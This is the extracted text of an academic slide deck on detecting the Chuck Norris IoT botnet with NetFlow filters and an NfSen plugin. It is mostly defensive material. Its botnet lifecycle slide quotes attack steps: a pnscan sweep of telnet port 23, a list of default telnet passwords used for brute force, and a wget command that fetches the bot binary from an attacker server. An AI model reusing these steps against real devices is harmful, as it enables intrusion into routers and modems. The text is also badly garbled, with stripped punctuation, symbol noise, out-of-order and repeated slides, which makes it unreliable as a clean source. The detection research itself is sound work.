httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
